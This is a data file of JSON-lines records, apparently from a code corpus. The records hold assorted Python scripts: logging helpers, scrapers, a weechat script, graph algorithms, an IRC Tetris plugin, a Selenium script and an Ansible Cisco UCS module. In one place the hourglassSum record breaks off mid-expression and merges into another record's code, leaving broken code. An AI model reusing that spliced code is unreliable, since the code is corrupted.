+{"seq_id":"214644723","text":"import json\nfrom fluent import sender,event\nimport traceback\n\nfluent_host = '127.0.0.1'\nfluent_port = 5170 #needs to be int\n\nfluent_port = int(fluent_port)\t#just in case someone was a dummy and set it as a string\n\nsender = sender.FluentSender( tag=\"rest\", host=fluent_host, port=fluent_port )\n\ndef log_json_output( j ):\n\ttry:\n\t\tlog_json( 'output', j )\n\texcept:\n\t\ttraceback.print_exc()\ndef log_json_input( j ):\n\ttry:\n\t\tlog_json( 'input', j )\n\texcept:\n\t\ttraceback.print_exc()\n\ndef log_json( tag, j ):\n\ttry:\n#\t\ttry:\n\t\t\td = json.loads( j )\n\t\t\tsender.emit( tag, d )\n#\t\texcept JSONDecodeError:\n#\t\t\tsender.emit( tag, {\"malformed json\": j } )\n#\t\t\traise\n\texcept:\n\t\ttraceback.print_exc()\n","sub_path":"linux/poolboy/fluentd.py","file_name":"fluentd.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"544752233","text":"'''\nProject: raw\nAuthors: Kevin Morris <kevr@nixcode.us>\nLicense: GPL2\nDescription: A weechat script for putting out escaped strings.\n'''\nimport weechat\nimport os\nimport re\nfrom os.path import basename, abspath, join, isfile\n\nscript_name = \"raw\"\n__authors__ = \"Kevin Morris\"\n__email__ = \"kevr@nixcode.us\"\n__version__ = \"0.1.0\"\n__license__ = \"GPL2\"\n\nfifo = ''\nconfig_dir = os.listdir(join(os.environ[\"HOME\"], \".weechat\"))\nfor f in config_dir:\n if re.search(r\"weechat_fifo_\\d+\", f):\n fifo = join(os.environ[\"HOME\"], \".weechat\", f)\n\ndef init():\n weechat.register(script_name, __authors__, __version__, __license__,\n \"{} - A raw string output script\".format(script_name), \"\", \"\")\n weechat.hook_command(\"raw\", \"Output a raw escaped string.\", 
\"\", \"\",\n \"\", \"command\", \"\")\n\n weechat.prnt(weechat.current_buffer(), \"Using fifo: {}\".format(fifo))\n\ndef command(data, buffer, args):\n\n with open(fifo, \"w\") as fh:\n fh.write(\"*{}\\n\".format(args.decode('UTF-8')))\n\n return weechat.WEECHAT_RC_OK\n\nif __name__ == \"__main__\":\n init()\n\n","sub_path":"python/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363643255","text":"import pandas as pd\nimport numpy as np\nimport glob\nimport warnings\nwarnings.simplefilter('ignore')\n\npath = r'data'\ncsv_files = glob.glob(path + \"/*.csv\")\ndata_files = glob.glob(path + \"/*.data\")\n\nli = {}\n\nfor filename in csv_files:\n print(filename)\n if filename[len(path)+1:-4] == \"naval_propulsion\":\n df = pd.read_csv(filename, header = None, sep = \" \")\n else :\n df = pd.read_csv(filename, header = None)\n li[filename[len(path)+1:-4]] = df\n \nfor filename in data_files:\n print(filename)\n df = pd.read_csv(filename, header = None)\n li[filename[len(path)+1:-5]] = df\n\n\ndef process(df, cy, cdrop = [], header = False, dummies = []):\n if header :\n df = df.drop(0, axis = 0)\n ndummies = []\n for d in dummies :\n ndrop = 1 if d > cy else 0\n for c in cdrop :\n if d > c :\n ndrop+= 1\n ndummies.append(d-ndrop)\n cols = [x for x in range(df.shape[1])]\n for c in cdrop:\n cols.remove(c)\n df1 = df.iloc[:, cols].dropna(axis = 0)\n ncy = cy\n for c in cdrop :\n if cy > c :\n ncy-=1\n Y = df1.iloc[:, ncy]\n cols1 = [x for x in range(df1.shape[1])]\n cols1.remove(ncy)\n df2 = df1.iloc[:, cols1]\n for d in ndummies : \n dcod = pd.get_dummies(df2.iloc[:, d], drop_first = True)\n dcod = dcod.set_axis([\"cat_\"+str(d)+str(i) for i in dcod.columns], axis = 1)\n df2 = df2.join(dcod)\n cols = [x for x in range(df2.shape[1])]\n rmcols = ndummies\n for r in rmcols :\n cols.remove(r)\n X = df2.iloc[:, cols]\n X = X.astype(float)\n Y = Y.astype(float)\n return X, Y\n\n\ndFrame = {\"blog\" : {\"cy\" : 280, \"cdrop\" : [277, 54, 262]},\n \"fbmetrics\" : {\"cy\" : 18, \"cdrop\" : [15, 16, 17], \"header\" : True, \"dummies\" : [1]},\n \"fbcom1\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"fbcom2\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"fbcom3\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"fbcom4\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"fbcom5\" : {\"cy\" : 53, \"cdrop\" : [33, 39, 46]},\n \"forestfires\" : {\"cy\" : 12, \"header\" : True, \"dummies\" : [2, 3]},\n \"turbine2011\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"turbine2012\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"turbine2013\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"turbine2014\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"turbine2015\" : {\"cy\" : 9, \"cdrop\" : [10], \"header\" : True},\n \"heart_failure\" : {\"cy\" : 12, \"header\" : True},\n \"naval_propulsion\" : {\"cy\" : 16, \"cdrop\" : [17]},\n \"aquatic_toxicity\" : {\"cy\" : 8},\n \"indoor\" : {\"cy\" : 520, \"cdrop\" : [521, 522, 523], \"header\" : True},\n \"news\" : {\"cy\" : 60, \"cdrop\" : [0, 1], \"header\" : True},\n \"parkinson\" : {\"cy\" : 5, \"cdrop\" : [4]},\n \"redwine\" : {\"cy\" : 11, \"header\" : True},\n \"whitewine\" : {\"cy\": 11, \"header\" : True},\n \"student-mat\": {\"cy\" : 32, \"cdrop\" : [30, 31], \"header\" : True, \"dummies\" : [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 15, 16, 17, 18, 19, 20, 21, 22]},\n \"student-por\" : {\"cy\" : 32, \"cdrop\" : 
[30, 31], \"header\" : True, \"dummies\" : [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 15, 16, 17, 18, 19, 20, 21, 22]},\n \"superconduct\" : {\"cy\" : 81, \"header\" : True},\n \"year\" : {\"cy\" : 0},\n \"temperature\" : {\"cy\" : 23, \"cdrop\" : [1, 24], \"header\" : True},\n \"communities\" : {\"cy\" : 127, \"cdrop\" : [0, 1, 2, 3, 4]},\n \"compressive\" : {\"cy\" : 8, \"header\" : True},\n \"residential\" : {\"cy\" : 107, \"cdrop\" : [108], \"header\" : True},\n \"carbon\" : {\"cy\" : 5, \"cdrop\" : [6, 7], \"header\" : True},\n \"yacht\" : {\"cy\" : 6},\n \"wave_adelaide\" : {\"cy\" : 48},\n \"wave_tasmania\" : {\"cy\" : 48},\n \"wave_perth\" : {\"cy\" : 48},\n \"wave_sydney\" : {\"cy\" : 48}}\n\n\ndX = {}\ndY = {}\nfor dfname in dFrame.keys():\n X, Y = process(li.get(dfname), dFrame[dfname][\"cy\"], dFrame[dfname].get(\"cdrop\", []),\n dFrame[dfname].get(\"header\", False), dFrame[dfname].get(\"dummies\", []))\n dX[dfname] = X.to_numpy()\n dY[dfname] = Y.to_numpy()\n\n","sub_path":"data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649032361","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-x86_64/egg/DS_Store_Cleaner/__main__.py\n# Compiled at: 2020-01-13 11:16:07\n# Size of source mod 2**32: 263 bytes\nimport sys\nfrom .DS_Store_Cleaner import *\n\ndef main():\n if len(sys.argv) > 1:\n files = all_file(sys.argv[1])\n remove_file(files)\n else:\n files = all_file(os.getcwd())\n remove_file(files)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/DS_Store_Cleaner-0.1-py3.7/__main__.cpython-37.py","file_name":"__main__.cpython-37.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"485205589","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport demjson\nimport json\n\nurl=\"http://sclub.jd.com/comment/productPageComments.action?productId=10395644636&score=0&sortType=3&page=0&pageSize=10&callback=fetchJSON_comment98vv83110\"\nhtml=urlopen(url).read().decode(\"gbk\")\n# print(html)\n# # print(html)\n# lsize=html.find('{')\n# rsize=html.rfind('}')+1\n# json1=json.loads(html[lsize:rsize])\n\n# hotcomm=json1[\"hotCommentTagStatistics\"]\n# for comm in hotcomm:\n# \tprint(comm[\"name\"]+\": \"+str(comm[\"count\"]))\n# # print(json1[\"hotCommentTagStatistics\"])\n# # # print(json1.keys())\n# # # json1 = demjson.encode(html)\n# print(json.dumps(json1, sort_keys=True, indent=4))\nlsize=html.find('{')\nrsize=html.rfind('}')+1\nhtml=html[lsize:rsize]\n\n\njson1=json.loads(html)\nprint(\"全部评论 : \"+str(json1[\"productCommentSummary\"][\"commentCount\"]))\nprint(\"好 评 : \"+str(json1[\"productCommentSummary\"][\"goodCount\"]))\nprint(\"中 评 : \"+str(json1[\"productCommentSummary\"][\"generalCount\"]))\nprint(\"差 评 : \"+str(json1[\"productCommentSummary\"][\"poorCount\"]))\nprint(\"------------\")\nprint()\nhotcomm=json1[\"hotCommentTagStatistics\"]\nfor comm in hotcomm:\n\tprint(comm[\"name\"]+\": \"+str(comm[\"count\"]))\n","sub_path":"jingdong/test/comm.py","file_name":"comm.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148612234","text":"import datetime\nimport os\nimport subprocess\nimport 
time\nimport traceback\n\nimport constant\n\n\ndef tranlatePath(path):\n return '\\\"' + path + '\\\"'\n\n\ndef delatyClose():\n end = constant.delay\n for x in range(end):\n print(end - x)\n time.sleep(1)\n\n\ndef get_popen(cmd):\n # creationflags=0x08000000 (CREATE_NO_WINDOW) hides the adb command window\n return subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, creationflags=0x08000000)\n\n\ndef getCommodText(cmd):\n text = ''\n try:\n # creationflags hides the adb command window (see get_popen)\n popen = get_popen(cmd)\n out, err = popen.communicate()\n\n for line in out.splitlines():\n text = text + line.decode('utf-8') + '\\n'\n\n if text == '' and err:\n for line in err.splitlines():\n text = text + line.decode('utf-8') + '\\n'\n\n except Exception as e:\n text = traceback.format_exc()\n return text\n\n\ndef getCurFormatTime():\n now_time = datetime.datetime.now()\n return datetime.datetime.strftime(now_time, '%Y-%m-%d %H:%M:%S')\n\n\ndef delete_file(path):\n if os.path.exists(path):\n try:\n os.remove(path)\n return True\n except Exception as e:\n f = open(path, encoding=\"utf-8\")\n f.close()\n os.remove(path)\n return False\n\n\nif __name__ == '__main__':\n print('util.py')\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"382451347","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nfrom copy import deepcopy\n\n'''\nclass holding information about the streets:\n- length\n- dirtiness\n- connection (adjacency) matrix\n- vector of cleaned streets\n'''\n\n\nclass Streets:\n def __init__(self):\n\n self.n = 40\n\n self.A = self.generate_new_A()\n\n self.L = self.generate_new_L(10, 80)\n\n self.G = self.generate_new_G()\n\n self.r = np.sum(np.triu(self.A, 1)) # number of streets\n\n self.fw_graph = self.Floyd_Warshall()\n\n\n def generate_new_A(self):\n matrix = np.random.rand(self.n, self.n)\n u_matrix = np.triu(matrix, 1)\n l_matrix = u_matrix.T\n sym_matrix = u_matrix + l_matrix\n new_A = np.round(sym_matrix)\n return new_A\n\n def generate_new_L(self, dist_min, dist_max):\n dist = np.random.randint(dist_min, dist_max, size=(self.n, self.n))\n u_dist = np.triu(dist, 1)\n l_dist = u_dist.T\n dist = u_dist + l_dist\n new_L = np.multiply(self.A, dist)\n return new_L\n\n def generate_new_G(self):\n g_matrix = np.random.randint(1, 4, (self.n, self.n))\n u_g_matrix = np.triu(g_matrix, 1)\n l_g_matrix = u_g_matrix.T\n g_matrix = u_g_matrix + l_g_matrix\n new_G = np.multiply(self.A, g_matrix)\n return new_G\n\n def update_r(self):\n self.r = np.sum(np.triu(self.A, 1))\n\n def load_matrices(self, folder_path):\n temp1 = temp2 = temp3 = 0\n matrices = {'A': temp1, 'G': temp2, 'L': temp3}\n for key, value in matrices.items():\n file_path = folder_path + key + '.xlsx'\n df = pd.read_excel(file_path)\n matrices[key] = df.to_numpy()\n self.A = matrices['A']\n self.G = matrices['G']\n self.L = matrices['L']\n\n def save_matrices(self, folder_path):\n matrices = {'A': self.A, 'G': self.G, 'L': self.L}\n for key, value in matrices.items():\n file_path = folder_path + key + '.xlsx'\n df = pd.DataFrame(data=value)\n writer = pd.ExcelWriter(file_path, engine='xlsxwriter')\n df.to_excel(writer, sheet_name='data', index=False)\n writer.save()\n\n def Floyd_Warshall(self): # Floyd-Warshall (or Dijkstra with BFS)\n G_copy = deepcopy(self.G)\n # path reconstruction matrix\n fw_graph = np.zeros(self.G.shape)\n 
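# Standard Floyd-Warshall relaxation over the dirtiness matrix G:\n # dist[i][j] = min(dist[i][j], dist[i][k] + dist[k][j]), with fw_graph\n # recording the predecessor of j on the best i->j path for reconstruction.\n 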
for i in range(0, self.n):\n for j in range(0, self.n):\n fw_graph[i, j] = i\n if G_copy[i, j] == 0:\n fw_graph[i, j] = -30000\n G_copy[i, j] = 30000 # set zeros to any large number which is bigger than the longest way\n\n for k in range(0, self.n):\n for i in range(0, self.n):\n for j in range(0, self.n):\n if G_copy[i, j] > G_copy[i, k] + G_copy[k, j]:\n G_copy[i, j] = G_copy[i, k] + G_copy[k, j]\n fw_graph[i, j] = fw_graph[k, j]\n return fw_graph\n","sub_path":"Street.py","file_name":"Street.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"88759166","text":"import random\nimport json\nimport itertools\n\nfrom bot.events import command, Callback\nfrom util.text import xchat_colour\n\n\nbraille = \"⠀⠁⠈⠉⠂⠃⠊⠋⠐⠑⠘⠙⠒⠓⠚⠛⠄⠅⠌⠍⠆⠇⠎⠏⠔⠕⠜⠝⠖⠗⠞⠟⠠⠡⠨⠩⠢⠣⠪⠫⠰⠱⠸⠹⠲⠳⠺⠻⠤⠥⠬⠭⠦⠧⠮⠯⠴⠵⠼⠽⠶⠷⠾⠿⡀⡁⡈⡉⡂⡃⡊⡋⡐⡑⡘⡙⡒⡓⡚⡛⡄⡅⡌⡍⡆⡇⡎⡏⡔⡕⡜⡝⡖⡗⡞⡟⡠⡡⡨⡩⡢⡣⡪⡫⡰⡱⡸⡹⡲⡳⡺⡻⡤⡥⡬⡭⡦⡧⡮⡯⡴⡵⡼⡽⡶⡷⡾⡿⢀⢁⢈⢉⢂⢃⢊⢋⢐⢑⢘⢙⢒⢓⢚⢛⢄⢅⢌⢍⢆⢇⢎⢏⢔⢕⢜⢝⢖⢗⢞⢟⢠⢡⢨⢩⢢⢣⢪⢫⢰⢱⢸⢹⢲⢳⢺⢻⢤⢥⢬⢭⢦⢧⢮⢯⢴⢵⢼⢽⢶⢷⢾⢿⣀⣁⣈⣉⣂⣃⣊⣋⣐⣑⣘⣙⣒⣓⣚⣛⣄⣅⣌⣍⣆⣇⣎⣏⣔⣕⣜⣝⣖⣗⣞⣟⣠⣡⣨⣩⣢⣣⣪⣫⣰⣱⣸⣹⣲⣳⣺⣻⣤⣥⣬⣭⣦⣧⣮⣯⣴⣵⣼⣽⣶⣷⣾⣿\"\n\ndef draw_braille(board):\n size = (len(board[0]), len(board))\n def getpix(y, x):\n try:\n return board[y][x]\n except IndexError:\n return 0\n lines = []\n for y in range(size[1]//4 + bool(size[1] % 4)):\n line = []\n row = y * 4\n for x in range(size[0]//2 + bool(size[0] % 2)):\n col = x * 2\n index = 0\n index += getpix(row, col)\n index += 2*getpix(row, col+1)\n index += 4*getpix(row+1, col)\n index += 8*getpix(row+1, col+1)\n index += 16*getpix(row+2, col)\n index += 32*getpix(row+2, col+1)\n index += 64*getpix(row+3, col)\n index += 128*getpix(row+3, col+1)\n line.append(braille[index])\n lines.append(\"\".join(line))\n return \"\\n\".join(lines)\n \n\ndef draw_half(board):\n size = (len(board[0]), len(board))\n def getpix(y, x):\n try:\n return board[y][x]\n except IndexError:\n return 0\n return \"\\n\".join(\"\".join(\"\\x03%.2d,%.2d▄\" % (getpix(2*y+1, x), getpix(2*y, x))\n for x in range(size[0]))\n for y in range(size[1]//2 + bool(size[1] % 2)))\n\n\nclass Game(object):\n COLORS = [10, 6, 3, 8, 9, 13, 11, 7, 2, 4]\n PIECES = [[[1, 1, 1, 1]],\n [[1, 1, 1], [0, 0, 1]],\n [[1, 1, 1], [1, 0, 0]],\n [[1, 1], [1, 1]],\n [[0, 1, 1], [1, 1, 0]],\n [[1, 1, 1], [0, 1, 0]],\n [[1, 1, 0], [0, 1, 1]],\n None] \n\n def __init__(self, name, size=(10, 12), board=None, players=None):\n self.name = name\n self.size = size\n if board is None:\n board = [[None for i in range(size[0])] for j in range(size[1])]\n self.board = board\n if players is None:\n players = {}\n self.players = players\n\n def serialise(self):\n return {\"size\": list(self.size), \"board\": self.board, \"players\": self.players}\n\n def rand_piece(self):\n return random.choice(self.PIECES)\n\n def add_player(self, key, name):\n self.players[key] = {\"name\":name, \"score\": 0, \"pieces\": [self.rand_piece(), self.rand_piece()], \"color\": xchat_colour(name)}\n\n \n\n\nclass Tetris(Callback):\n TETRIS_SAVED = \"tetris_games.json\"\n\n def __init__(self, server):\n self.save_file = server.get_config_dir(self.TETRIS_SAVED)\n try:\n with open(self.save_file) as f:\n self.games = json.load(f)\n self.games = {k: Game(k, *v) for k, v in self.games.items()}\n except:\n self.games = {}\n\n self.server = server\n super().__init__(server)\n\n def init_game(self, channel):\n chan = self.server.lower(channel)\n if chan not in self.games:\n self.games[chan] = Game(channel)\n return self.games[chan]\n\n def ensure_created(self, channel, user):\n game = self.init_game(channel)\n luser = self.server.lower(user)\n if luser not in game.players:\n game.add_player(luser, user)\n return game\n\n\n 
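# Rendering helpers: draw_half maps each vertical pixel pair onto one\n # colour-coded IRC half-block, while draw_piece uses draw_braille, which\n # packs every 2x4 pixel block into a single braille glyph (the eight\n # pixels are summed with weights 1,2 / 4,8 / 16,32 / 64,128 row by row\n # to index the pre-ordered braille lookup string above).\n 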
def draw(self, x): return draw_half(x)\n\n def draw_piece(self, x): return draw_braille(x)\n \n def format_user(self, player):\n currentp, nextp = player['pieces'][0], player['pieces'][1]\n if currentp is None:\n currentp = [\"\\x034💣\"]\n else:\n currentp = self.draw([[player['color'] if j else j for j in i] for i in currentp]).split(\"\\n\")\n if nextp is None:\n nextp = [\"\\x034💣\"]\n else:\n nextp = self.draw([[player['color'] if j else j for j in i] for i in nextp]).split(\"\\n\")\n currentpl, nextpl = len(currentp), len(nextp)\n if currentpl > nextpl:\n nextp.extend([\" \" * (len(player['pieces'][1]) if player['pieces'][1] is not None else 1)] * (currentpl - nextpl))\n else:\n currentp.extend([\" \" * (len(player['pieces'][0]) if player['pieces'][0] is not None else 1)] * (nextpl - currentpl))\n height = max(currentpl, nextpl)\n left = [\"\\x0312⡇\\x03 Current: \"] + ([\"\\x0312⡇\\x03 \"] * (height - 1))\n mid = [\"\\x0f · Next: \"] + ([\"\\x0f \"] * (height - 1))\n lines = zip(left, currentp, mid, nextp)\n lines = [\"%s%s%s%s\" % s for s in lines]\n lines[0] += \"\\x0f · Score: %d\" % player[\"score\"]\n return \"\\n\".join(lines) \n\n def format_game(self, game):\n out = \"₀₁₂₃₄₅₆₇₈₉\\n\"\n out += self.draw([[game.players[p][\"color\"] if p is not None else 0 for p in row] for row in game.board])\n return out + \"\\n₀₁₂₃₄₅₆₇₈₉\"\n\n def overlaps(self, board, piece, xy):\n xoff, yoff = xy\n for y, row in enumerate(piece):\n for x, v in enumerate(row):\n if v and (y + yoff >= len(board) or board[y+yoff][x+xoff] is not None):\n return True\n return False\n\n @command\n def piece(self, server, message):\n game = self.ensure_created(message.context, message.address.nick)\n player = game.players[self.server.lower(message.address.nick)]\n return self.format_user(player)\n\n @command(\"turn\", \"(\\d*)\")\n def turn(self, server, message, num):\n game = self.ensure_created(message.context, message.address.nick)\n player = game.players[self.server.lower(message.address.nick)]\n if num:\n num = int(num) % 4\n else:\n num = 1\n for i in range(num):\n player['pieces'][0] = list(zip(*player['pieces'][0][::-1]))\n return self.format_user(player)\n\n @command\n def tetris(self, server, message):\n game = self.ensure_created(message.context, message.address.nick)\n return self.format_game(game)\n\n @command(\"drop\", \"(\\d+)\")\n def drop(self, server, message, index: int):\n game = self.ensure_created(message.context, message.address.nick)\n player = game.players[self.server.lower(message.address.nick)]\n piece = player['pieces'][0]\n xoff = int(index)\n yoff = 0\n\n # Bounds check for index\n if not (0 <= xoff <= (len(game.board[0]) - (len(piece[0]) if piece is not None else 1))):\n return \"\\x034⡇\\x03 Invalid index\"\n\n player['pieces'] = [player['pieces'][1], game.rand_piece()]\n\n # Calculate where the blocks fall\n while not self.overlaps(game.board, piece or [[1]], (xoff, yoff)):\n yoff += 1\n yoff -= 1\n if yoff < 0 and piece is not None:\n # Trigger a purge\n for y, row in enumerate(game.board):\n for x, v in enumerate(row):\n if v == self.server.lower(message.address.nick):\n game.board[y][x] = None\n server.message(self.format_user(player), message.address.nick, \"NOTICE\")\n return self.format_game(game)\n\n if piece is None:\n yoff += 1\n for x, y in [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 0), (0, 1), (1, -1), (1, 0), (1, 1)]:\n if 0 <= y + yoff < len(game.board) and 0 <= x + xoff < len(game.board[0]):\n game.board[y+yoff][x+xoff] = None\n else:\n for y, row in 
enumerate(piece):\n for x, v in enumerate(row):\n if v:\n game.board[y+yoff][x+xoff] = self.server.lower(message.address.nick)\n\n # Eliminate pieces\n full = []\n for i, row in enumerate(game.board):\n if all(row):\n for p in row:\n game.players[p][\"score\"] += 1\n full.append(i)\n for i in full:\n del game.board[i]\n game.board = [[None for i in range(game.size[0])]] + game.board\n server.message(self.format_user(player), message.address.nick, \"NOTICE\")\n return self.format_game(game)\n\n\n__initialise__ = Tetris","sub_path":"plugins/games/tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":8870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491780506","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 12:14:01 2019\n\n@author: Kycool13\n\"\"\"\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the hourglassSum function below.\ndef hourglassSum(arr):\n hourGlasses = 0;\n hgCurrent = -sys.maxsize;\n rows = 0; \n for h in range(4):\n for i in range(4):\n hgSum = 0 \n for k in range(i,i + 3):\n hgSum += arr[rows][k]; \n hgSum += arr[rows+1][i+1];\n for j in range(i,i + 3):\n hgSum += arr[rows+2][j];\n hourGlasses +=1;\n if(hgCurrent= 400:\n race.append('black')\n elif 20 <= weight[i] < 150:\n race.append('pink')\n elif 150 <= weight[i] < 250:\n race.append('brown')\n elif 250 <= weight[i] < 400:\n race.append('black')\n\ndata = pd.DataFrame({'weight': weight, 'taste': taste, 'race': race})\ndata.to_csv('data/pig.csv', index=False)","sub_path":"data_gen.py","file_name":"data_gen.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95455727","text":"from datetime import date\n\n\ndef next_birthday(day, births):\n # assert births, 'No data...'\n remaining_days = float('inf')\n # Convert tuples to dates.\n today = date(*day)\n for name, birth in births.items():\n birthdate = date(*birth)\n # assert today >= birthdate, f'{name} is not born yet!'\n # Find the next birthday of `name`.\n for year in (today.year, today.year + 1):\n try:\n birthday = birthdate.replace(year=year)\n except ValueError:\n # If \"February 29th\" does not exists then it is \"March 1st\".\n birthday = date(year, 3, 1)\n if birthday >= today:\n break\n days = (birthday - today).days\n if days < remaining_days:\n remaining_days, ages = days, {}\n if days == remaining_days:\n ages[name] = birthday.year - birthdate.year\n return [remaining_days, ages]\n","sub_path":"verification/my_solution.py","file_name":"my_solution.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478413699","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ncoordinate library\n~~~~~~~~~~~~~~~~~~\n\nCoordinate is a grid converter, written in Python, for human beings.\n\n >>> import coordinate\n >>> c = coordinate.latlng(12.345, 23.4423)\n >>> c.mgrs\n 200\n\n\n\"\"\"\n\n__title__ = 'coordinate'\n__version__ = '0.0.1'\n__author__ = 'Cpl Denis Carriere'\n\nfrom .api import all, mgrs, mercator, utm, dms\n","sub_path":"lib/coordinate/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587598057","text":"#coding=utf-8\nfrom selenium import webdriver\nimport 
time\nwf=webdriver.Firefox()\nwf.get(\"http://www.bilibili.com\")\nwf.implicitly_wait(2)\nhandle=wf.current_window_handle\nprint(handle)\nwf.find_element_by_id(\"search-keyword\").send_keys(\"王老菊\")\nwf.find_element_by_class_name(\"search-submit\").click()\nwf.implicitly_wait(2)\nhandle_all=wf.window_handles\nprint(handle_all)\nwf.switch_to_window(handle_all[1])\nwf.find_element_by_xpath(\"html/body/div[5]/ul/li[3]/div/div[1]/a\").click()\nhandle_all=wf.window_handles\nprint(handle_all)\nwf.switch_to_window(handle_all[2])\ntime.sleep(5)\nwf.maximize_window()\nwf.quit()\n","sub_path":"selenium demo(test)/bili.py","file_name":"bili.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"172689325","text":"#!/usr/bin/env python\n\nfrom ansible.module_utils.basic import *\n\nANSIBLE_METADATA = {'metadata_version': '1.0',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: cisco_ucs_keyring\nshort_description: configures keyring on a cisco ucs server\nversion_added: 0.9.0.0\ndescription:\n - configures keyring on a cisco ucs server\noptions:\n state:\n description:\n - if C(present), will perform create/add/enable operation\n - if C(absent), will perform delete/remove/disable operation\n required: false\n choices: ['present', 'absent']\n default: \"present\"\n name:\n version_added: \"1.0(1e)\"\n description: key ring name\n required: true\n modulus:\n version_added: \"1.0(1e)\"\n description: modulus\n required: false\n choices: ['mod2048', 'mod2560', 'mod3072', 'mod3584', 'mod4096', 'modinvalid']\n default: \"mod2048\"\n regen:\n version_added: \"1.0(1e)\"\n description: regen\n required: false\n choices: ['yes', 'no']\n default: \"no\"\n policy_owner:\n version_added: \"2.1(1a)\"\n description: policy owner\n required: false\n choices: ['local', 'pending-policy', 'policy']\n default: \"local\"\n tp:\n version_added: \"1.0(1e)\"\n description: trusted point name\n required: false\n cert:\n version_added: \"1.0(1e)\"\n description: certificate text\n required: false\n descr:\n version_added: \"1.0(1e)\"\n description: description\n required: false\n\nrequirements: ['ucsmsdk', 'ucsm_apis']\nauthor: \"Cisco Systems Inc(ucs-python@cisco.com)\"\n'''\n\n\nEXAMPLES = '''\n- name:\n cisco_ucs_keyring:\n name: \"testkeyring\"\n modulus: \"mod2048\"\n regen: \"no\"\n policy_owner: \"local\"\n tp: \"testtp\"\n cert: \"certificatetext\"\n descr: \"description\"\n state: \"present\"\n ucs_ip: \"192.168.1.1\"\n ucs_username: \"admin\"\n ucs_password: \"password\"\n'''\n\n\ndef _argument_mo():\n return dict(\n name=dict(required=True, type='str'),\n modulus=dict(type='str',\n choices=['mod2048', 'mod2560', 'mod3072', 'mod3584',\n 'mod4096', 'modinvalid'],\n default=\"mod2048\"),\n regen=dict(type='str', choices=['yes', 'no'], default=\"no\"),\n policy_owner=dict(type='str',\n choices=['local', 'pending-policy', 'policy'],\n default=\"local\"),\n tp=dict(type='str'),\n cert=dict(type='str'),\n descr=dict(type='str'),\n )\n\n\ndef _argument_custom():\n return dict(\n state=dict(default=\"present\",\n choices=['present', 'absent'],\n type='str'),\n )\n\n\ndef _argument_connection():\n return dict(\n # UcsHandle\n ucs_server=dict(type='dict'),\n\n # Ucs server credentials\n ucs_ip=dict(type='str'),\n ucs_username=dict(default=\"admin\", type='str'),\n ucs_password=dict(type='str', no_log=True),\n ucs_port=dict(default=None),\n ucs_secure=dict(default=None),\n 
